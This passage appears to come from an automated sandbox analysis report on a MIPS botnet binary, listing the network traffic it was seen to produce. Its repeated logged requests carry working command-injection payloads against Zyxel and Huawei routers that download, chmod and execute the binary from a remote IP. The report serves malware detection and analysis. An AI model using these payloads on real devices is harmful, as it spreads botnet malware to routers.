            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: global trafficHTTP traffic detected: GET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.180.149.156/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;
            Source: unknownDNS traffic detected: queries for: haha.skyljne.click
            Source: unknownHTTP traffic detected: POST /ctrlt/DeviceUpgrade_1 HTTP/1.1Connection: keep-aliveAccept: */*Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"Content-Length: 472Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 33 2e 31 38 30 2e 31 34 39 2e 31 35 36 20 2d 6c 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 2d 72 20 2f 68 75 68 75 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 3b 20 2f 74 6d 70 2f 6c 69 6e 75 78 78 78 20 73 65 6c 66 72 65 70 2e 68 75 61 77 65 69 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 103.180.149.156 -l /tmp/linuxxx -r /huhu.mips; /bin/busybox chmod 777 /tmp/linuxxx; /tmp/linuxxx selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 02 Feb 2024 06:21:17 GMTServer: webserverX-Content-Type-Options: nosniffX-Frame-Options: SAMEORIGINX-XSS-Protection: 1; mode=blockContent-Length: 202Content-Type: text/htmlConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6c 6f 63 61 74 65 20 64 6f 63 75 6d 65 6e 74 3a 20 2f 67 6f 66 6f 72 6d 2f 73 65 74 5f 4c 69 6d 69 74 43 6c 69 65 6e 74 5f 63 66 67 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't locate document: /goform/set_LimitClient_cfg</p></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: httpdDate: Thu, 01 Feb 2024 21:22:05 GMTContent-Type: text/htmlContent-Security-Policy: default-src 'self' www.linksys.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;X-Content-Security-Policy: default-src 'self' www.linksys.com; style-src 'self' 'unsafe-inline'; script-src 'self' 'unsafe-inline' 'unsafe-eval'; img-src 'self' data:;Connection: close
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/plainContent-Length: 30Connection: close
            Source: huhu.mips.elfString found in binary or memory: http://103.180.149.156/huhu.mips;$
            Source: huhu.mips.elfString found in binary or memory: http://103.180.149.156/huhu.mpsl;
            Source: huhu.mips.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
            Source: huhu.mips.elfString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
            Source: unknownNetwork traffic detected: HTTP traffic on port 57084 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50452 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39648 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50440 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36130 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47270 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40650 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35298 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60266 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54802 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45088 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 50464 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36154 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60242 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37480 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35274 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 57096 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40662 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 60278 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 52608 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 54814 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37010 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53958 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 51320 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 45076 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 47282 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59290 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35262 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 53934 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40674 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41812
            Source: unknownNetwork traffic detected: HTTP traffic on port 49426 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41814
            Source: unknownNetwork traffic detected: HTTP traffic on port 36166 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49438 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41810
            Source: unknownNetwork traffic detected: HTTP traffic on port 60230 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41938 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41800
            Source: unknownNetwork traffic detected: HTTP traffic on port 37022 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41802
            Source: unknownNetwork traffic detected: HTTP traffic on port 53946 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37034 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40686 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 39600 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 59216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37492 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 34394 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 36178 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 35250 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 56180 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41530 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40216 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41926 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53840
            Source: unknownNetwork traffic detected: HTTP traffic on port 41914 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38744 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38212
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53842
            Source: unknownNetwork traffic detected: HTTP traffic on port 48186 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38206
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38208
            Source: unknownNetwork traffic detected: HTTP traffic on port 38372 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37046 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41856
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41850
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53858
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53856
            Source: unknownNetwork traffic detected: HTTP traffic on port 37058 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53850
            Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53854
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53852
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38204
            Source: unknownNetwork traffic detected: HTTP traffic on port 53910 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41848
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41844
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41846
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41840
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41842
            Source: unknownNetwork traffic detected: HTTP traffic on port 52200 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44196 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51208
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53868
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51206
            Source: unknownNetwork traffic detected: HTTP traffic on port 38360 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58348 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 42410 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53862
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51200
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53860
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53866
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51204
            Source: unknownNetwork traffic detected: HTTP traffic on port 56192 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 40204 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53864
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51202
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41838
            Source: unknownNetwork traffic detected: HTTP traffic on port 59228 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48534 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41834
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41836
            Source: unknownNetwork traffic detected: HTTP traffic on port 38756 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 38768 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 41902 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41832
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51218
            Source: unknownNetwork traffic detected: HTTP traffic on port 53922 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51216
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53878
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51210
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53872
            Source: unknownNetwork traffic detected: HTTP traffic on port 58336 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 44184 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53870
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51214
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53876
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 51212
            Source: unknownNetwork traffic detected: HTTP traffic on port 52212 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53874
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41826
            Source: unknownNetwork traffic detected: HTTP traffic on port 40698 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41828
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53880
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41822
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41824
            Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41820
            Source: unknownNetwork traffic detected: HTTP traffic on port 48174 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53804
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53802
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38250
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53808
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53806
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38252
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38254
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38256
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53800
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38258
            Source: unknownNetwork traffic detected: HTTP traffic on port 54838 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 48150 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 37864 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 58324 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41898
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41892
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41894
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53814
            Source: unknownNetwork traffic detected: HTTP traffic on port 48162 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 41890
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53818
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38240
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53816
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38242
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38244
            Source: unknownNetwork traffic detected: HTTP traffic on port 42434 -> 443
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 38246
            Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 53810
